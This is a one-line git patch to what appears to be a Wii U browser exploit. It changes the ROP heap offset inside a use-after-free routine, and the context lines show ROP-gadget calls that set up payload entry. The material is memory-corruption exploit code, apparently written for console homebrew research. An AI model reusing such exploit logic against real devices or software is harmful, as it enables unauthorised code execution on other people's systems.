From 28851926b89be081a6a58c49081b612d95b04b9a Mon Sep 17 00:00:00 2001
From: WiiUTest <31256994+WiiUTest@users.noreply.github.com>
Date: Tue, 22 May 2018 17:05:08 +0200
Subject: [PATCH] 32K stack size seems good !

---
 payload/exploit_WORKING.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payload/exploit_WORKING.html b/payload/exploit_WORKING.html
index d753f8c..b25ec82 100644
--- a/payload/exploit_WORKING.html
+++ b/payload/exploit_WORKING.html
@@ -217,7 +217,7 @@ function UaF(a)
 
         //prepare payload argument
         payload_srcaddr = payloadAdress;
-        ROPHEAP = payload_srcaddr + 0x800000;
+        ROPHEAP = payload_srcaddr + _32K;
         ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
 
         //Jump on the payload